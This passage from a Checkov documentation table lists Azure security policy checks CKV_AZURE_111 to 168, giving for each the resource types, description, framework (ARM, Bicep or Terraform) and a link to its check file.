[KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | +| 1873 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault 
enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | +| 1874 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | +| 1875 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | +| 1876 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | +| 1877 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | +| 1878 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | +| 1879 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | +| 1880 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | 
[SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | +| 1881 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | +| 1882 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | +| 1883 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | +| 1884 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | +| 1885 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | +| 1886 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | +| 1887 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | 
[NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | +| 1888 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | +| 1889 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1890 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1891 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | +| 1892 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | +| 1893 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | +| 1894 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or 
"Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | +| 1895 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | +| 1896 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | +| 1897 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | +| 1898 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | +| 1899 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | +| 1900 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | 
[ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | +| 1901 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | +| 1902 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | +| 1903 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | +| 1904 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | +| 1905 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | +| 1906 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | +| 1907 | CKV_AZURE_131 | resource | 
azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | +| 1908 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | +| 1909 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) | +| 1910 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | +| 1911 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | +| 1912 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | +| 1913 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | +| 1914 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | +| 1915 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | +| 1916 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | +| 1917 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | +| 1918 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | +| 1919 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | +| 1920 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | +| 1921 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | +| 1922 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | +| 1923 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | +| 1924 | CKV_AZURE_142 | resource | 
azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | +| 1925 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | +| 1926 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | +| 1927 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 1928 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 1929 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 1930 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 1931 | CKV_AZURE_145 | resource | azurerm_function_app | 
Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1932 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1933 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1934 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1935 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1936 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1937 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | 
[PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | +| 1938 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | +| 1939 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | +| 1940 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 1941 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 1942 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 1943 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 1944 | 
CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1945 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1946 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | +| 1947 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 1948 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 1949 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | +| 1950 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) 
| +| 1951 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1952 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1953 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1954 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | +| 1955 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | +| 1956 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | +| 1957 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has 
data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | +| 1958 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | arm | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 1959 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | Bicep | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 1960 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure Databricks Workspace data plane to control plane communication happens over private link | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | +| 1961 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1962 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1963 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | 
[NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 1964 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 1965 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 1966 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 1967 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1968 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1969 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | +| 1970 | 
CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | +| 1971 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | +| 1972 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | +| 1973 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | +| 1974 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | +| 1975 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | +| 1976 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. 
